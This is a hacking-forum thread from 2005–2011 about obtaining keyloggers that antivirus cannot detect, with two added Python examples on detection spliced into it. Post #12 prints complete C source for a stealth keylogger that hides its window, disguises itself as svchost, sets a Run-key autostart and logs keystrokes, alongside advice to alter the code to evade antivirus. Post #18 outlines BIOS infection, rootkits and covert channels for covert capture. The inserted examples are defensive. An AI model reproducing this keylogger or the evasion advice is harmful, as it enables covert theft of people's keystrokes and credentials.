
Undetectable KeyLoggers?


21 replies to this topic

#1 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 26 September 2005 - 07:42 PM

Anyone familiar with any software-based keyloggers that are undetectable? By undetectable I mean that none of the antivirus/spyware programs are able to catch it, and that it can be installed with no problem?
Thanks.

#2 spoekalb

spoekalb

    DDP r0x0rz my s0x0rz

  • Agents of the Revolution
  • 1,280 posts
  • Gender:Male

Posted 26 September 2005 - 07:54 PM

If you know C/C++ you might be able to write something that watches the keyboard buffer and dumps to a file.

#3 Dr^ZigMan

Dr^ZigMan

    Publish or Perish!

  • Agents of the Revolution
  • 1,207 posts
  • Location:561

Posted 26 September 2005 - 07:56 PM

If you know C/C++ you might be able to write something that watches the keyboard buffer and dumps to a file.



Yeah, the antivirus isn't seeing the virus, it's seeing the checksum for it. Sure they have heuristics, but those are crap anyway.
-Dr^ZigMan

#4 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 26 September 2005 - 08:32 PM

If you know C/C++ you might be able to write something that watches the keyboard buffer and dumps to a file.



I did write a couple of basic viruses and keyloggers based on C plus... But it didn't seem to work well with McAfee Anti Virus. I was just wondering if anyone knew about any undetectable (preferably free) keylogging software that's floating around.

(When McAfee live scan is enabled it won't even let me execute the setup.)

#5 lowtec

lowtec

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 492 posts

Posted 26 September 2005 - 08:40 PM

Anything that is free will already be in every AV's database. If you want something to be undetectable you will have to write / modify it yourself.

#6 tehbizz

tehbizz

    Progenitor of noob slaying

  • Members
  • 2,039 posts
  • Gender:Male

Posted 26 September 2005 - 09:24 PM

Use a hardware-based one, Symantec will never detect that!

#7 PyleFMJ

PyleFMJ

    DDP Fan club member

  • Members
  • 42 posts
  • Location:US

Posted 26 September 2005 - 09:31 PM

Hardware is the way to go. I've seen ones that are pretty much flash memory sticks that you plug the keyboard into and then plug the device into the comp. They weren't more than 50 bucks a couple of years ago.

#8 tokachu

tokachu

    SUPR3M3 31337 Mack Daddy P1MP

  • Agents of the Revolution
  • 458 posts
  • Country:
  • Gender:Male

Posted 26 September 2005 - 09:38 PM

I think the whole hardware keylogger thing might be dying. See this link:
http://www.keyghost....B-Keylogger.htm

The newest USB keyloggers only work with "legacy" USB keyboards. None of Apple's USB keyboards will work, period. IBM's (now Lenovo) USB keyboards don't work either, since they're both keyboards and USB 2.0 hubs, and you can only use a USB keylogger if you have a USB mouse that's attached to a separate port (???). Also, the hardware keylogger shows up in the USB devices menu!

#9 XlogicX

XlogicX

    SUP3R 31337

  • Validating
  • 160 posts
  • Gender:Male
  • Location:Tempe (Phoenix area)

Posted 27 September 2005 - 01:14 AM

hmm, that's weird.

I've used a couple of PS2 keyloggers. Even on USB keyboards, I just got a converter for those. It doesn't show up in the devices either. It's just a hardware buffer.

I don't want to sound over ambitious, but the possibility is there to make your own hardware keylogger too (just like you could code your own software). This would probably be something of more dedication though, that and the final product would probably be a larger size than most of the commercial products.

#10 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 27 September 2005 - 08:19 AM

White Scorpion wrote one a while back and released the code. I can't find it on his site anymore, but here is the thread where the source is:

http://www.antionlin...threadid=261930

#11 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 27 September 2005 - 12:03 PM

White Scorpion wrote one a while back and released the code. I can't find it on his site anymore, but here is the thread where the source is:

http://www.antionlin...threadid=261930



I compiled White Scorpion's code, but it still got detected by McAfee On_Scan...
Hey, I haven't used any of the hardware keyloggers such as KeyKatcher. Anyone used one of these? How do you extract info from them after it's full? And can you password-protect the logs?

#12 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 27 September 2005 - 12:14 PM

Did you try to change it a bit so the binary won't be the same? I compiled this:

/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 
*                                                                                  *
*  File: SVCHOST.c                                                                 *
*                                                                                  *
*  Purpose: a stealth keylogger, writes to file "svchost.log"                      *
*                                                                                  *       
*  Usage: compile to svchost.exe, copy to c:\%windir%\ and run it.                 *
*                                                                                  *
*  Copyright (C) 2004 White Scorpion, www.white-scorpion.nl, all rights reserved   *
*                                                                                  *
*  This program is free software; you can redistribute it and/or                   *
*  modify it under the terms of the GNU General Public License                     *
*  as published by the Free Software Foundation; either version 2                  *
*  of the License, or (at your option) any later version.                          *
*                                                                                  *
*  This program is distributed in the hope that it will be useful,                 *
*  but WITHOUT ANY WARRANTY; without even the implied warranty of                  *
*  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the                   *
*  GNU General Public License for more details.                                    *
*                                                                                  *
*  You should have received a copy of the GNU General Public License               *
*  along with this program; if not, write to the Free Software                     *
*  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.     *
*                                                                                  *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    AllocConsole();
    stealth=FindWindowA("ConsoleWindowClass",NULL);
    ShowWindow(stealth,0);
   
    int test,create;
    test=test_key();/*check if key is available for opening*/
         
    if (test==2)/*create key*/
    {
        char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
        create=create_key(path);
          
    }
        
   
    int t=get_keys();
    
    return t;
}  

int get_keys(void)
{
            short character;
              while(1)
              {
                     sleep(10);/*to prevent 100% cpu usage*/
                     for(character=8;character<=222;character++)
                     {
                         if(GetAsyncKeyState(character)==-32767)
                         {   
                             
                             FILE *file;
                             file=fopen("svchost.log","a+");
                             if(file==NULL)
                             {
                                     return 1;
                             }            
                             if(file!=NULL)
                             {        
                                     if((character>=39)&&(character<=64))
                                     {
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }        
                                     else if((character>64)&&(character<91))
                                     {
                                           character+=32;
                                           fputc(character,file);
                                           fclose(file);
                                           break;
                                     }
                                     else
                                     { 
                                         switch(character)
                                         {
                                               case VK_SPACE:
                                               fputc(' ',file);
                                               fclose(file);
                                               break;    
                                               case VK_SHIFT:
                                               fputs("[SHIFT]",file);
                                               fclose(file);
                                               break;                                            
                                               case VK_RETURN:
                                               fputs("\n[ENTER]",file);
                                               fclose(file);
                                               break;
                                               case VK_BACK:
                                               fputs("[BACKSPACE]",file);
                                               fclose(file);
                                               break;
                                               case VK_TAB:
                                               fputs("[TAB]",file);
                                               fclose(file);
                                               break;
                                               case VK_CONTROL:
                                               fputs("[CTRL]",file);
                                               fclose(file);
                                               break;    
                                               case VK_DELETE:
                                               fputs("[DEL]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_1:
                                               fputs("[;:]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_2:
                                               fputs("[/?]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_3:
                                               fputs("[`~]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_4:
                                               fputs("[ [{ ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_5:
                                               fputs("[\\|]",file);
                                               fclose(file);
                                               break;                                
                                               case VK_OEM_6:
                                               fputs("[ ]} ]",file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_7:
                                               fputs("['\"]",file);
                                               fclose(file);
                                               break;
                                               /*case VK_OEM_PLUS:
                                               fputc('+',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_COMMA:
                                               fputc(',',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_MINUS:
                                               fputc('-',file);
                                               fclose(file);
                                               break;
                                               case VK_OEM_PERIOD:
                                               fputc('.',file);
                                               fclose(file);
                                               break;*/
                                               case VK_NUMPAD0:
                                               fputc('0',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD1:
                                               fputc('1',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD2:
                                               fputc('2',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD3:
                                               fputc('3',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD4:
                                               fputc('4',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD5:
                                               fputc('5',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD6:
                                               fputc('6',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD7:
                                               fputc('7',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD8:
                                               fputc('8',file);
                                               fclose(file);
                                               break;
                                               case VK_NUMPAD9:
                                               fputc('9',file);
                                               fclose(file);
                                               break;
                                               case VK_CAPITAL:
                                               fputs("[CAPS LOCK]",file);
                                               fclose(file);
                                               break;
                                               default:
                                               fclose(file);
                                               break;
                                        }        
                                   }    
                              }        
                    }    
                }                  
                     
            }
            return EXIT_SUCCESS;                            
}                                                 

int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
    
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {    
        check=1;
        return check;
    }        
           
    reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
    
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
         
    RegCloseKey(hKey);
    return check;   
}
   
int create_key(char *path)
{   
        int reg_key,check;
        
        HKEY hkey;
        
        reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
        if(reg_key==0)
        {
                RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
                check=0;
                return check;
        }
        if(reg_key!=0)
                check=1;
                
        return check;
}


With the Bloodshed C++ beta, and Symantec did not see it. (The precompiled binary that came with the source was detected.) If you change the code around a bit, like using a different log file name, it may not be detected.
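The two points made in post #3 (the AV matches a checksum of the binary) and post #12 (a rebuild with a different log file name slips past it) together describe why a defender should not rely on file hashes alone. The following is an added example, not code from this thread or from White Scorpion: it models an exact-hash signature on two constructed byte strings, then audits three constructed Run-key entries for the persistence behaviour the posted source actually exhibits (a value named "svchost" pointing at c:\%windir%\svchost.exe, stored as REG_SZ where %windir% is never expanded). The system-binary list, the directory list and the three sample entries are assumptions chosen for illustration; nothing here touches a real registry.

```python
"""Added example: brittle hash signature vs. a stable persistence indicator.

Runs offline on constructed data only.
"""
import hashlib
import ntpath
import re

# Constructed stand-ins for two builds of the same program; the only
# difference is the log-file name embedded in the image.
ORIGINAL_BUILD = b"MZ...\x00svchost.log\x00...rest-of-image..."
REBUILT_BUILD = b"MZ...\x00update.log\x00...rest-of-image..."

# A "signature" in the sense of post #3: the SHA-256 of one known sample.
KNOWN_BAD_HASHES = {hashlib.sha256(ORIGINAL_BUILD).hexdigest()}


def hash_signature_matches(image: bytes) -> bool:
    """Exact-hash detection: true only for the byte-identical sample."""
    return hashlib.sha256(image).hexdigest() in KNOWN_BAD_HASHES


# Assumed list of Windows system binaries whose names get borrowed; the
# posted source registers itself as "svchost".
SYSTEM_BINARY_NAMES = {"svchost", "lsass", "csrss", "winlogon", "explorer"}
# Assumed locations where those names are legitimate.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows")


def image_path(command: str) -> str:
    """Extract the executable path from a Run-key command line."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(" ", 1)[0]


def audit_run_entry(value_name: str, value_type: str, command: str) -> list[str]:
    """Return the reasons (possibly none) one Run-key value looks suspicious.

    The three arguments model one value under
    HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run as it would be
    read from a registry export. The checks are assumed audit rules.
    """
    findings = []
    image = image_path(command)
    base = ntpath.basename(image).lower()
    stem = base[:-4] if base.endswith(".exe") else base
    image_dir = ntpath.dirname(image).lower()

    # 1. A REG_SZ value is not environment-expanded, so a literal %var%
    #    in it (as in the posted code's c:\%windir%\svchost.exe) never
    #    resolves and points to a hand-written entry.
    if value_type == "REG_SZ" and re.search(r"%[^%]+%", command):
        findings.append("unexpanded environment variable in REG_SZ value")

    # 2. Value name or image name mimics a system binary, but the image
    #    is not in a system directory.
    mimics = value_name.lower() in SYSTEM_BINARY_NAMES or stem in SYSTEM_BINARY_NAMES
    in_system_dir = image_dir in SYSTEM_DIRS
    if mimics and not in_system_dir:
        findings.append(f"system-binary name '{stem}' outside system directories: {image}")

    # 3. The real svchost.exe is started by the Service Control Manager,
    #    never from the Run key, so any svchost Run entry is a finding.
    if stem == "svchost":
        findings.append("svchost.exe is never legitimately launched from the Run key")
    return findings


# Constructed Run-key entries: what the posted source creates, a renamed
# rebuild dropped in a user profile, and a benign vendor-style entry.
SAMPLE_RUN_ENTRIES = [
    ("svchost", "REG_SZ", r"c:\%windir%\svchost.exe"),
    ("WindowsUpdate", "REG_SZ", r"C:\Users\alice\AppData\Roaming\svchost.exe"),
    ("SecurityHealth", "REG_EXPAND_SZ", r"%windir%\system32\SecurityHealthSystray.exe"),
]


def audit_all(entries=SAMPLE_RUN_ENTRIES) -> dict:
    """Map each entry's value name to its list of findings."""
    return {name: audit_run_entry(name, vtype, cmd) for name, vtype, cmd in entries}


if __name__ == "__main__":
    print("exact-hash match, original build:", hash_signature_matches(ORIGINAL_BUILD))
    print("exact-hash match, rebuilt build: ", hash_signature_matches(REBUILT_BUILD))
    for name, findings in audit_all().items():
        print(f"{name}: {findings or 'no findings'}")
```

The hash check fails on the rebuilt image the moment one embedded string changes, which is exactly the evasion post #12 describes; the Run-key audit flags both the original and the renamed rebuild because the persistence behaviour, not the bytes, is what it keys on. On a live host the same rules would be run over an export of the Run key rather than the constructed list.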

#13 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 27 September 2005 - 12:31 PM

Did you try to change it a bit so the binary won't be the same? I compiled this:

[...]





Did the same thing you did... I have McAfee OnScan/LiveScan and it detects it and won't even install.

#14 Irongeek

Irongeek

    Dangerous free thinker

  • Agents of the Revolution
  • 1,516 posts
  • Location:Louisville, Ky more or less

Posted 27 September 2005 - 12:36 PM

So you are saying you did change the code? For example, change the name of the reg key it uses, the logfile or just about anything to make the binary a little different?

#15 XlogicX

XlogicX

    SUP3R 31337

  • Validating
  • 160 posts
  • Gender:Male
  • Location:Tempe (Phoenix area)

Posted 27 September 2005 - 07:05 PM

The keykatcher is password protected. You access it with any text editor.

This article was from a while back, but still relevant.
http://www.phx2600.o.../keylogging.htm

#16 st0rm

st0rm

    HACK THE PLANET!

  • Banned
  • 59 posts

Posted 27 September 2005 - 11:55 PM

So you are saying you did change the code? For example, change the name of the reg key it uses, the logfile or just about anything to make the binary a little different?




Yup..you said it.

#17 Bluerose

Bluerose

    Will I break 10 posts?

  • Members
  • 4 posts
  • Country:
  • Gender:Female
  • Location:uk

Posted 18 May 2011 - 03:13 AM

Anyone familiar with any software based keyloggers that are undetectable? .....by undetectable I mean none of the anti virus/spyware programs being not able catch it? and being able to install it with no problem?
thanks

You need a commercial keylogger, I guess.
Take a look at the following:
perfect keylogger
keylogger for PC

Edited by Bluerose, 23 May 2011 - 04:24 AM.


#18 army_of_one

army_of_one

    SUP3R 31337 P1MP

  • Members
  • 282 posts

Posted 28 August 2011 - 12:30 AM

Anyone familiar with any software based keyloggers that are undetectable? .....by undetectable I mean none of the anti virus/spyware programs being not able catch it? and being able to install it with no problem?
thanks


First, compromise the machine physically with a boot attack (e.g. evil maid), FireWire, or DMA over a custom PCI/ExpressCard device. Then, you have some options:

1. Modify the installed OS to load Windows, your rootkit and a bogus AV app that has a visible icon & basic dialog. Keylogger included.
2. Virtualize Windows with a subverted hypervisor/VMM, with your rootkit controlling the "real" keyboard.
3. Disable the AV entirely (hoping they won't notice) and put in a run-of-the-mill keylogger.
4. Modify the keyboard driver to send any key pressed to your software, which just looks like it's moving memory. Another process sends that to you over a safe channel.

The most undetectable attack is the one almost all computers are vulnerable to and nobody looks for. Well, there are three there: infections that survive reformat, covert channels and emanation security. Such esoteric attacks are my specialty. They are insidious.

Infections that survive reformat are classic. The best way to do it is BIOS infection. Get their BIOS, modify it to contain your rootkit as well, and it loads until they can overwrite their BIOS. (A good design should prevent that but requires much sophistication.) Many academics are [finally] looking into using trusted hardware connected to main chips to look for malware & stuff. Well, guess what? You can use the same approach to constantly inject malware or leak the keyboard's internal communications. You should use a tiny SOC & connect it in a professional-looking way. Best to do it to an identical piece of hardware, put in their hard disk, break it in a believably innocent way, and let them do a "clean" install. Their system will remain dirty until they buy new hardware. (oh the lulz... 8)

A covert channel can form any time two subjects (e.g. users, processes) share an object (e.g. CPU time, a storage area). A covert storage channel uses a shared storage resource to move information. A covert timing channel happens when two processes can see how long it takes to use a given resource. The sender alternates between tying it up and making it quick, representing 1's and 0's. There are ways to mostly eliminate these, but modern OS's ignore them altogether. (Yes, I am grinning most evilly.) The keyboard driver or API could be modified to subtly leak key information over a covert channel. Covert channel bandwidth ranges from 1 bps to several MBps. The cache issue for AES & RSA was a covert timing channel caused by cache interactions. I and many others identified tons of covert storage channels in TCP/UDP/IP stacks (I think I posted an analysis here). There's still around 64+ bits of extra space per packet that many people won't pay attention to. One HTTP session sends TONS of packets. Insert something into the TCP/IP stack to utilize that if it sees a certain unique identifier in the system call data. So many possibilities. A typical sysadmin would never notice & not be able to comprehend what was happening. (I haven't even begun on processor or firmware errata... mainly because the other vulnerabilities are always there lol 8)

EMSEC is emanation security. This is the electromagnetic emanations that a computer emits during its operations that may contain patterns that can be used to reconstruct what it did. The emanations may be passively sent into the surrounding area, actively polled by the attacker, or transmitted over power lines. There are other side channels as well. (In around 2000-2001, I designed a concept of using the sound of keys being pressed with a laser bounce on a keyboard or laptop. I think that was independently done a year or two ago.) The EMSEC issues require power filters, shielded cabling, and properly shielded equipment. This is under the umbrella of TEMPEST. TEMPEST Level 1 products are expensive, bulky and hard to get hold of. The government also classifies what we need to know to protect ourselves. (And, no, a TEMPEST expert told me a Faraday cage isn't the end-all solution it sounds like.) I don't have the links but you should Google "keyboard eavesdropping" with words like power outlet and antenna. A group of researchers did it in the past few years on video and put it online.

So, stealth keylogging is easy because *real* security is hard & the market provides no incentives to build it. High assurance (A1/EAL7/NSA-Type1) design techniques can prevent most or all of these problems. However, high assurance systems are a rarity & modern OS's and hardware leak like a sieve. Hence, if you're using the latter and your enemy is [smart/determined/sophisticated], you're screwed. Q.E.D.

Nick P
schneier.com
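
The covert storage channel the post describes, as an added example that is not part of the original post or of any tool the thread mentions: a sender hides two bytes of message per packet in the 16-bit IPv4 Identification field, the receiver reassembles them, and a detector heuristic flags a flow whose IDs do not advance like a counter. Header bytes and the "benign" comparison flow are constructed in memory; nothing is sent on the wire. The addresses, the threshold `max_step` and the use of the ID field alone are my assumptions; the post's figure of 64+ spare bits per packet covers more header fields than this example uses.

```python
"""Covert storage channel in the IPv4 Identification field: sender, receiver, detector.

Added example, not from the post. Only the 16-bit ID field is used (two bytes of
payload per packet); headers are constructed in memory and never transmitted.
"""
import struct
from typing import List

IPV4_HEADER_LEN = 20


def build_ipv4_header(ident: int, src: str = "10.0.0.2", dst: str = "10.0.0.1",
                      payload_len: int = 0) -> bytes:
    """Minimal IPv4 header (no options) carrying the given Identification value.
    Checksum is left zero; the point is the header layout, not a sendable packet."""
    ver_ihl = (4 << 4) | 5                 # IPv4, 5 x 32-bit words
    total_len = IPV4_HEADER_LEN + payload_len
    flags_frag = 0x4000                    # DF set, fragment offset 0
    ttl, proto, checksum = 64, 6, 0        # TCP
    src_b = bytes(int(x) for x in src.split("."))
    dst_b = bytes(int(x) for x in dst.split("."))
    return struct.pack("!BBHHHBBH4s4s", ver_ihl, 0, total_len, ident,
                       flags_frag, ttl, proto, checksum, src_b, dst_b)


def ipv4_id(header: bytes) -> int:
    """Identification field sits at byte offset 4..6 of the IPv4 header."""
    return struct.unpack("!H", header[4:6])[0]


def encode_covert(message: bytes) -> List[bytes]:
    """Sender side: hide two message bytes per packet in the ID field."""
    if len(message) % 2:
        message += b"\x00"                 # pad to whole 16-bit words
    return [build_ipv4_header(struct.unpack("!H", message[i:i + 2])[0])
            for i in range(0, len(message), 2)]


def decode_covert(headers: List[bytes]) -> bytes:
    """Receiver side: reassemble the message from the ID fields (drops pad byte)."""
    return b"".join(struct.pack("!H", ipv4_id(h)) for h in headers).rstrip(b"\x00")


def benign_headers(n: int, start: int = 0x1000) -> List[bytes]:
    """What a counter-based stack emits for one flow (constructed comparison data)."""
    return [build_ipv4_header((start + i) & 0xFFFF) for i in range(n)]


def looks_like_counter(headers: List[bytes], max_step: int = 64) -> bool:
    """Detector heuristic: consecutive IDs of one flow should advance by a small,
    positive step. A flow whose IDs jump around is either a randomising stack or
    a storage channel; either way it is worth a second look."""
    ids = [ipv4_id(h) for h in headers]
    for a, b in zip(ids, ids[1:]):
        step = (b - a) & 0xFFFF
        if step == 0 or step > max_step:
            return False
    return True


if __name__ == "__main__":
    covert = encode_covert(b"hunter2")
    print("recovered:", decode_covert(covert))
    print("benign flow counter-like:", looks_like_counter(benign_headers(10)))
    print("covert flow counter-like:", looks_like_counter(covert))
```

The caveat a defender needs: some stacks randomise the ID field, so failing the counter test is a triage signal rather than proof of a channel; a real detector would compare against what the sending OS is known to do, and would look at the other spare header bits the post alludes to as well.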

#19 Afterm4th

Afterm4th

    SUPR3M3 31337 Mack Daddy P1MP

  • Members
  • 403 posts
  • Country:
  • Gender:Male
  • Location:way up north eh

Posted 02 September 2011 - 12:54 PM

[quotes army_of_one's post #18 in full]

^what he said

#20 dinscurge

dinscurge

    "I Hack, therefore, I am"

  • Members
  • 938 posts
  • Country:
  • Gender:Male
  • Location:the bunker

Posted 03 September 2011 - 10:32 PM

But keylogging is useless when people like Google are pushing for everything to be cloud; just use ettercap/wireshark and sslstrip. Even besides that, almost all passwords/usernames, whatever, are for websites/forums/videogames etc. that would use the net anyway. As for overwriting the BIOS, not cool :p. There's some kind of chance you're trashing their motherboard if you prevent them from flashing over the BIOS; say a new CPU comes out for that socket they want, good luck with that ;). It's too far out of the way anyway just to get some password.



